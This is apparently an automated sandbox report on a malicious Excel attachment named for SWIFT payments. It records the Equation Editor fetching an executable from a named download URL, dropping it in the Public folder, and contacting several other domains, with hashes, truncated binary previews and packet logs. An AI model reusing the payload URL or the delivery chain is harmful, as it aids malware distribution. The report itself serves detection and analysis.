                                              131.153.37.4
                                              mikeloayza.comUnited States
                                              20454SSASN2UStrue

                                              General Information

                                              Joe Sandbox Version:34.0.0 Boulder Opal
                                              Analysis ID:553293
                                              Start date:14.01.2022
                                              Start time:16:03:14
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 11m 7s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:SWIFT - Copy - Copy.xlsx
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:10
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.expl.evad.winXLSX@9/6@6/5
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HDC Information:
                                              • Successful, ratio: 25.8% (good quality ratio 24.8%)
                                              • Quality average: 71.7%
                                              • Quality standard deviation: 28.6%
                                              HCA Information:
                                              • Successful, ratio: 100%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .xlsx
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Active ActiveX Object
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                              • TCP Packets have been reduced to 100
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size getting too big, too many NtCreateFile calls found.
                                              • Report size getting too big, too many NtEnumerateValueKey calls found.
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              16:03:46API Interceptor106x Sleep call for process: EQNEDT32.EXE modified
                                              16:03:51API Interceptor74x Sleep call for process: Pcportk28.exe modified
                                              16:04:12API Interceptor215x Sleep call for process: wininit.exe modified
                                              16:04:57API Interceptor1x Sleep call for process: explorer.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              No context

                                              Domains

                                              No context

                                              ASN

                                              No context

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\i4L[1].exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:downloaded
                                              Size (bytes):601600
                                              Entropy (8bit):7.208019029819951
                                              Encrypted:false
                                              SSDEEP:12288:VK777777777777N7sPip0jsXSEf2V3SVP5AmeTZVYclQ3eRrYtf:VK777777777777lsKp0A3MC7CxS3YrY
                                              MD5:25EE51200E7D86AB2C531748E5C01C72
                                              SHA1:6BE3C75759C1F9428299B82394DEAFAD3B165D57
                                              SHA-256:33BB2954B5EFD072D71B4D7BF79EB609E4143A01023C15F8239F3A93561052E0
                                              SHA-512:B90110F86236C04D92405B7931606FFB82533863F7A141115A545C5C1949115298F4D1296C950D176CF33B1EB0A1489D76548A8E186168ADA03E1B25A420EA4F
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              IE Cache URL:https://mikeloayza.com/E9/i4L.exe
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G.a.....................>........... ... ....@.. ....................................@.................................p...K.... ...:...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....:... ...<..................@..@.reloc.......`.......,..............@..B........................H.......,f...-......E.......6y............................................{....*"..}....*.....{....*"..}....*.....{....*"..}....*.....{....*"..}....*.....{....*"..}....*....0.......... ........8....8....r...p.(......8....r;..p.(...... .....:....&8....r...p.(...... .....:....&.(.......(....9.... ........8........ ........8....r...p.(.......(....:....~....8.....(.......(.......(.....(.......(....:....~....8.....(.......(.......(.....(.......(....:....~....8.....(.......(.......
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\i4L[1].htm
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:HTML document, ASCII text
                                              Category:dropped
                                              Size (bytes):241
                                              Entropy (8bit):5.144431573763422
                                              Encrypted:false
                                              SSDEEP:6:pn0+Dy9xwol6hEr6VX16hu9nPfV8Ni+KqD:J0+ox0RJWWP98zT
                                              MD5:5C1BF763B986387E9E117DABF2FB37BC
                                              SHA1:29F8142D2580878381BBB0DFD7D333C924C24093
                                              SHA-256:9A0E4DD90EF8EFA0B54BBF9C1A810F227A9C4BA08AD315470A2BC519023F5DB0
                                              SHA-512:48397E5342820C32752A23EFC6D6776784ADA4950C591A21373B06DABA50467B489761C6018660D518B448A6B6F7121382DA33F916AC06905C1005952361B176
                                              Malicious:false
                                              Reputation:low
                                              Preview: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html><head>.<title>301 Moved Permanently</title>.</head><body>.<h1>Moved Permanently</h1>.<p>The document has moved <a href="https://mikeloayza.com/E9/i4L.exe">here</a>.</p>.</body></html>.
                                              C:\Users\user\AppData\Local\Temp\7916.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Composite Document File V2 Document, Cannot read section info
                                              Category:dropped
                                              Size (bytes):1536
                                              Entropy (8bit):1.1464700112623651
                                              Encrypted:false
                                              SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                              MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                              SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                              SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                              SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Temp\~DF01B9A0A507F75E4B.TMP
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1708032
                                              Entropy (8bit):7.361455956824453
                                              Encrypted:false
                                              SSDEEP:49152:+QKkr5BOPqqENGfJbDan2Kmg6RsOEX0q:+Q7sNEYNDw
                                              MD5:1A8EF3975ACA5EEFAE5D35CFA752A22B
                                              SHA1:D4400575CB198B054E2FEED616010C57AD07525F
                                              SHA-256:17026E92707F76D3A8BE214E3EEA223A2A7630E162923B159DF6193837E0F91F
                                              SHA-512:B14A70C0BA99CDA8231C3419AC1B5F0EDB1AD3C451BE2B9E449E5FBA5C771FE0E24604F61DBA8D107088DFAE67C3A213B5017CE59AC2F1EBEA452E9B0FEFAB45
                                              Malicious:false
                                              Reputation:low
                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\Desktop\~$SWIFT - Copy - Copy.xlsx
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):165
                                              Entropy (8bit):1.4377382811115937
                                              Encrypted:false
                                              SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                              MD5:797869BB881CFBCDAC2064F92B26E46F
                                              SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                              SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                              SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                              Malicious:true
                                              Reputation:high, very likely benign file
                                              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              C:\Users\Public\Pcportk28.exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):601600
                                              Entropy (8bit):7.208019029819951
                                              Encrypted:false
                                              SSDEEP:12288:VK777777777777N7sPip0jsXSEf2V3SVP5AmeTZVYclQ3eRrYtf:VK777777777777lsKp0A3MC7CxS3YrY
                                              MD5:25EE51200E7D86AB2C531748E5C01C72
                                              SHA1:6BE3C75759C1F9428299B82394DEAFAD3B165D57
                                              SHA-256:33BB2954B5EFD072D71B4D7BF79EB609E4143A01023C15F8239F3A93561052E0
                                              SHA-512:B90110F86236C04D92405B7931606FFB82533863F7A141115A545C5C1949115298F4D1296C950D176CF33B1EB0A1489D76548A8E186168ADA03E1B25A420EA4F
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G.a.....................>........... ... ....@.. ....................................@.................................p...K.... ...:...................`....................................................... ............... ..H............text........ ...................... ..`.rsrc....:... ...<..................@..@.reloc.......`.......,..............@..B........................H.......,f...-......E.......6y............................................{....*"..}....*.....{....*"..}....*.....{....*"..}....*.....{....*"..}....*.....{....*"..}....*....0.......... ........8....8....r...p.(......8....r;..p.(...... .....:....&8....r...p.(...... .....:....&.(.......(....9.... ........8........ ........8....r...p.(.......(....:....~....8.....(.......(.......(.....(.......(....:....~....8.....(.......(.......(.....(.......(....:....~....8.....(.......(.......

                                              Static File Info

                                              General

                                              File type:Microsoft Excel 2007+
                                              Entropy (8bit):7.998825501408383
                                              TrID:
                                              • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                              • ZIP compressed archive (8000/1) 16.67%
                                              File name:SWIFT - Copy - Copy.xlsx
                                              File size:1400294
                                              MD5:338cbe8a882d7c941afe2cf895055bd5
                                              SHA1:f081a9d12054b2e1a59d3eae4fa65059db634268
                                              SHA256:097ce13d935a168aa627794fce83fb57b3ad39989c46b574acb13820edbafe4a
                                              SHA512:544deb29896756b4391cd46cd0e76154c837530a5e2512ef03c6dc90145f98d43b6c7469625ad082bfc0929940177808e62d3deafd6412a626f1c0301adc32d6
                                              SSDEEP:24576:Ggp3MkrfAEnTlQdzPqdACoEh1GxdIGbHXMFxPrt/Qe6KxwfqI+WSKbjqRJc3satR:/Mkr1ZsPqkEDGbfbH4L2sESKbCc3Ptek
                                              File Content Preview:PK...........T>...............[Content_Types].xmlUT...C..aC..aC..a.U.N.0..#.....q........7.......m<...=...............3.xx.h\1..6.J...(..`..T....w".$..r.C%....|.o......=V.&.gR...QX.....Cj..k....TM@....R.O..G.C....@...{..V5.#.N....9(.O..+`.....Y.....7....x

                                              File Icon

                                              Icon Hash:e4e2aa8aa4b4bcb4

                                              Static OLE Info

                                              General

                                              Document Type:OpenXML
                                              Number of OLE Files:1

                                              OLE File "/opt/package/joesandbox/database/analysis/553293/sample/SWIFT - Copy - Copy.xlsx"

                                              Indicators

                                              Has Summary Info:False
                                              Application Name:unknown
                                              Encrypted Document:False
                                              Contains Word Document Stream:
                                              Contains Workbook/Book Stream:
                                              Contains PowerPoint Document Stream:
                                              Contains Visio Document Stream:
                                              Contains ObjectPool Stream:
                                              Flash Objects Count:
                                              Contains VBA Macros:False

                                              Summary

                                              Author:
                                              Last Saved By:
                                              Create Time:2006-09-16T00:00:00Z
                                              Last Saved Time:2021-04-20T13:49:29Z
                                              Creating Application:Microsoft Excel
                                              Security:0

                                              Document Summary

                                              Thumbnail Scaling Desired:false
                                              Company:
                                              Contains Dirty Links:false
                                              Shared Document:false
                                              Changed Hyperlinks:false
                                              Application Version:12.0000

                                              Streams

                                              Stream Path: \x1oLe10nAtiVE, File Type: data, Stream Size: 1687673
                                              General
                                              Stream Path:\x1oLe10nAtiVE
                                              File Type:data
                                              Stream Size:1687673
                                              Entropy:7.35599527556
                                              Base64 Encoded:True
                                              Data ASCII:. ) ; . . 5 & . { . . . . . . . . . c % ~ . M . . 8 . . . . . . 5 . . . . 0 . . 2 Q . . . . . # . . . | . . . . . . . . E . u . V . / B ~ . . . . e S . z . . Q M p . & 5 . . . . . x . w v z . . W w . . . s . n . . 7 _ . . . . . . . < . . . / . . . . . . . k . K $ . B A h N . g . 4 . < s . . A # . . F A . . . . . . + . % . . . . ! . % . . J . . ! . . . P . . . T . B . v J d . . . . . V J g v . a . . . . . g . \\ t i ` . . K ) / . . v . . 4 . . . . . . ; . . = . . . . . . . 4 % . i d . w . . N c e . . . " .
                                              Data Raw:d0 29 3b 06 02 35 26 e3 7b ee 01 08 f7 a0 b8 bd bf e7 63 25 7e bd 4d 8c 8b 38 8b 0f ba b3 e6 15 35 81 c2 fd 80 30 cb 8b 32 51 ff d6 05 8d c2 23 01 05 02 7c e7 fe ff e0 e4 82 dd 0c 45 00 75 cc 56 d8 2f 42 7e a4 01 c7 20 b6 65 53 c3 7a f4 cc 51 4d 70 0d 26 35 fe b8 06 9c a4 78 89 77 76 7a e1 2e 57 77 06 a4 03 73 ff 6e bd 1a 37 5f 1b d5 a6 7f fe 8c ef 3c d1 a2 dc 2f b0 9d 9e f4 e8 ad
                                              Stream Path: HDsuMKhCbfmuqyxLqNuKc, File Type: empty, Stream Size: 0
                                              General
                                              Stream Path:HDsuMKhCbfmuqyxLqNuKc
                                              File Type:empty
                                              Stream Size:0
                                              Entropy:0.0
                                              Base64 Encoded:False
                                              Data ASCII:
                                              Data Raw:

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              01/14/22-16:06:04.365376TCP1201ATTACK-RESPONSES 403 Forbidden804917234.102.136.180192.168.2.22

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 14, 2022 16:04:33.911838055 CET4916780192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:34.100852013 CET8049167131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:34.100967884 CET4916780192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:34.101399899 CET4916780192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:34.290345907 CET8049167131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:34.291004896 CET8049167131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:34.291089058 CET4916780192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:34.481738091 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:34.481784105 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:34.481870890 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:34.489912987 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:34.489944935 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:34.890429974 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:34.890625954 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:34.906006098 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:34.906070948 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:34.906405926 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:34.906527042 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.145149946 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.185965061 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.331522942 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.331724882 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.515368938 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.515399933 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.515492916 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.515561104 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.515573978 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.515604973 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.515619040 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.515795946 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.697778940 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.698010921 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.698127985 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.698180914 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.698206902 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.698276043 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.698321104 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.698429108 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.698492050 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.698589087 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.698719978 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.880594015 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.880655050 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.880733013 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.880759001 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.880779982 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.880796909 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.880805016 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.880819082 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.880861044 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.880877972 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.880930901 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.880981922 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.881046057 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.881048918 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.881058931 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:35.881093979 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:35.881150961 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.063811064 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.063884020 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.064023972 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.064043999 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.064068079 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.064124107 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.064136028 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.064156055 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.064169884 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.064194918 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.064238071 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.064457893 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.064536095 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.064630985 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.064646006 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.064656973 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.064711094 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.065083027 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.065138102 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.065174103 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.065182924 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.065238953 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.065263987 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.065325022 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.101618052 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.101684093 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.101718903 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.101737022 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.101748943 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.101754904 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.101772070 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.101780891 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.248202085 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.248265028 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.248383999 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.248436928 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.248467922 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.248492002 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.248526096 CET49168443192.168.2.22131.153.37.4
                                              Jan 14, 2022 16:04:36.248541117 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.248564959 CET44349168131.153.37.4192.168.2.22
                                              Jan 14, 2022 16:04:36.248634100 CET49168443192.168.2.22131.153.37.4

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Jan 14, 2022 16:04:33.695847034 CET5216753192.168.2.228.8.8.8
                                              Jan 14, 2022 16:04:33.875735044 CET53521678.8.8.8192.168.2.22
                                              Jan 14, 2022 16:05:43.551692963 CET5059153192.168.2.228.8.8.8
                                              Jan 14, 2022 16:05:43.590673923 CET53505918.8.8.8192.168.2.22
                                              Jan 14, 2022 16:05:53.711869001 CET5780553192.168.2.228.8.8.8
                                              Jan 14, 2022 16:05:53.744340897 CET53578058.8.8.8192.168.2.22
                                              Jan 14, 2022 16:05:59.160648108 CET5903053192.168.2.228.8.8.8
                                              Jan 14, 2022 16:05:59.182547092 CET53590308.8.8.8192.168.2.22
                                              Jan 14, 2022 16:06:04.200428963 CET5918553192.168.2.228.8.8.8
                                              Jan 14, 2022 16:06:04.228068113 CET53591858.8.8.8192.168.2.22
                                              Jan 14, 2022 16:06:09.376717091 CET5561653192.168.2.228.8.8.8
                                              Jan 14, 2022 16:06:09.671801090 CET53556168.8.8.8192.168.2.22

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Jan 14, 2022 16:04:33.695847034 CET192.168.2.228.8.8.80x5e41Standard query (0)mikeloayza.comA (IP address)IN (0x0001)
                                              Jan 14, 2022 16:05:43.551692963 CET192.168.2.228.8.8.80x8eb8Standard query (0)www.fisioletsgo.comA (IP address)IN (0x0001)
                                              Jan 14, 2022 16:05:53.711869001 CET192.168.2.228.8.8.80xc18cStandard query (0)www.bitcointradel.comA (IP address)IN (0x0001)
                                              Jan 14, 2022 16:05:59.160648108 CET192.168.2.228.8.8.80xfc43Standard query (0)www.freeadakahamazon.comA (IP address)IN (0x0001)
                                              Jan 14, 2022 16:06:04.200428963 CET192.168.2.228.8.8.80x9c63Standard query (0)www.executive-air.netA (IP address)IN (0x0001)
                                              Jan 14, 2022 16:06:09.376717091 CET192.168.2.228.8.8.80x30e0Standard query (0)www.luckyfandom.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Jan 14, 2022 16:04:33.875735044 CET8.8.8.8192.168.2.220x5e41No error (0)mikeloayza.com131.153.37.4A (IP address)IN (0x0001)
                                              Jan 14, 2022 16:05:43.590673923 CET8.8.8.8192.168.2.220x8eb8No error (0)www.fisioletsgo.com216.239.34.21A (IP address)IN (0x0001)
                                              Jan 14, 2022 16:05:43.590673923 CET8.8.8.8192.168.2.220x8eb8No error (0)www.fisioletsgo.com216.239.32.21A (IP address)IN (0x0001)
                                              Jan 14, 2022 16:05:43.590673923 CET8.8.8.8192.168.2.220x8eb8No error (0)www.fisioletsgo.com216.239.38.21A (IP address)IN (0x0001)
                                              Jan 14, 2022 16:05:43.590673923 CET8.8.8.8192.168.2.220x8eb8No error (0)www.fisioletsgo.com216.239.36.21A (IP address)IN (0x0001)
                                              Jan 14, 2022 16:05:53.744340897 CET8.8.8.8192.168.2.220xc18cNo error (0)www.bitcointradel.combitcointradel.comCNAME (Canonical name)IN (0x0001)
                                              Jan 14, 2022 16:05:53.744340897 CET8.8.8.8192.168.2.220xc18cNo error (0)bitcointradel.com162.0.209.73A (IP address)IN (0x0001)
                                              Jan 14, 2022 16:05:59.182547092 CET8.8.8.8192.168.2.220xfc43Name error (3)www.freeadakahamazon.comnonenoneA (IP address)IN (0x0001)
                                              Jan 14, 2022 16:06:04.228068113 CET8.8.8.8192.168.2.220x9c63No error (0)www.executive-air.netexecutive-air.netCNAME (Canonical name)IN (0x0001)
                                              Jan 14, 2022 16:06:04.228068113 CET8.8.8.8192.168.2.220x9c63No error (0)executive-air.net34.102.136.180A (IP address)IN (0x0001)
                                              Jan 14, 2022 16:06:09.671801090 CET8.8.8.8192.168.2.220x30e0No error (0)www.luckyfandom.com118.67.131.217A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • mikeloayza.com
                                              • www.fisioletsgo.com
                                              • www.bitcointradel.com
                                              • www.executive-air.net
                                              • www.luckyfandom.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.2249168131.153.37.4443C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              TimestampkBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              1192.168.2.2249167131.153.37.480C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              TimestampkBytes transferredDirectionData
                                              Jan 14, 2022 16:04:34.101399899 CET0OUTGET /E9/i4L.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: mikeloayza.com
                                              Connection: Keep-Alive
                                              Jan 14, 2022 16:04:34.291004896 CET1INHTTP/1.1 301 Moved Permanently
                                              Date: Fri, 14 Jan 2022 15:04:33 GMT
                                              Server: Apache
                                              Location: https://mikeloayza.com/E9/i4L.exe
                                              Content-Length: 241
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 69 6b 65 6c 6f 61 79 7a 61 2e 63 6f 6d 2f 45 39 2f 69 34 4c 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
